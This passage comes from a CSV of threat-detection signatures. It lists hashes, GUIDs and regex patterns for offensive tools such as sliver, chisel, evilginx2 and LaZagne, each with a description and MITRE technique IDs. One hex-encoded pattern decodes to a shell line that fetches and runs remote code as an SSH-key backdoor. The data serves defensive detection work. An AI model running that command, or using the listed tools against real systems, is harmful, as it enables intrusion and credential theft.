T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*595D5812-AA30-4EDE-95DA-8EDD7B8844BD*",".{0,1000}595D5812\-AA30\-4EDE\-95DA\-8EDD7B8844BD.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b*",".{0,1000}596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6*",".{0,1000}597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1*",".{0,1000}59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702*",".{0,1000}59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd*",".{0,1000}59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5A0FBE0D-BACC-4B97-8578-B5B27567EEA7*",".{0,1000}5A0FBE0D\-BACC\-4B97\-8578\-B5B27567EEA7.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38*",".{0,1000}5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5a1f9b0e-9f7c-4673-bf16-4740707f41b7*",".{0,1000}5a1f9b0e\-9f7c\-4673\-bf16\-4740707f41b7.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" 
"*5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff*",".{0,1000}5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50*",".{0,1000}5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad*",".{0,1000}5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*5A403F3C-9136-4B67-A94E-02D3BCD3162D*",".{0,1000}5A403F3C\-9136\-4B67\-A94E\-02D3BCD3162D.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*",".{0,1000}5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" 
"*5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e*",".{0,1000}5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a*",".{0,1000}5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*",".{0,1000}5A6F942E\-888A\-4CE1\-A6FB\-1AB8AE22AFFA.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49*",".{0,1000}5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c*",".{0,1000}5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5A9955E4-62B7-419D-AB73-01A6D7DD27FC*",".{0,1000}5A9955E4\-62B7\-419D\-AB73\-01A6D7DD27FC.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*5AC309CE-1223-4FF5-AF84-24BCD0B9E4DC*",".{0,1000}5AC309CE\-1223\-4FF5\-AF84\-24BCD0B9E4DC.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054*",".{0,1000}5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f*",".{0,1000}5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4*",".{0,1000}5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437*",".{0,1000}5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951*",".{0,1000}5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of 
capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46*",".{0,1000}5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9*",".{0,1000}5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7*",".{0,1000}5b55d8a0b50b89156ef7d09cffede9385fdad53301c16f2570a1888e7ee1cdf7.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*",".{0,1000}5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" 
"*5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917*",".{0,1000}5b6250d39e2f2855743616842353bab496aafcb7bc2a45169a54bc94f7939917.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf*",".{0,1000}5b64c12376f1ec1b876ede9b84f6883ee5f1ee5065e945dc2115c5e04c02aadf.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a*",".{0,1000}5b6868ca1b71f60e801421d7f1629422c0e894bf3c4d0d45778a483ca3d8a41a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5bb0b56e047e1453a3695ec0b9478b84*",".{0,1000}5bb0b56e047e1453a3695ec0b9478b84.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890*",".{0,1000}5bfec4da2bd86d19199d74b0b95f044a2dc4ef0fc40941315b0d0ac49e6fb890.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501*",".{0,1000}5c177feedd58a6ccc8287dee8c767dd486f2b5c55c234360be17f85fcbaa4501.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" 
"*5C3AD9AC-C62C-4AA8-BAE2-9AF920A652E3*",".{0,1000}5C3AD9AC\-C62C\-4AA8\-BAE2\-9AF920A652E3.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12*",".{0,1000}5c5bd260c00111edc55b4bc8a82d72e0a510f738ce3696ab2bbcd4a38a84bb12.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d*",".{0,1000}5c5dc6546877d616c4479df133654a0fbccc71d5279aa63f2ca560a5abfea31d.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe*",".{0,1000}5c611fb030683dba08662997836b3b308c0278130bf2eee6ac6af6a4332285fe.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" 
"*5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf*",".{0,1000}5c778de24421d1fca1048bde1f9f37e75cd23a127199159d2064da3b26574faf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5*",".{0,1000}5c78c058c8278438ce30b86b3ccda222410206ec0ea5727b93b74bb8c6748bd5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472*",".{0,1000}5c899d6ea0bdfbe381997096421365463461811ac73b1f3d559aceb765a26472.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d*",".{0,1000}5c9765e765eabf0879fa522b08114cf379a2a8d3a6d92c4f9cfcb1ad49a9cf5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422*",".{0,1000}5ca23515c4b5ea064981ecab60416b9a6b85e6220cd4ea7dff72522993251422.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 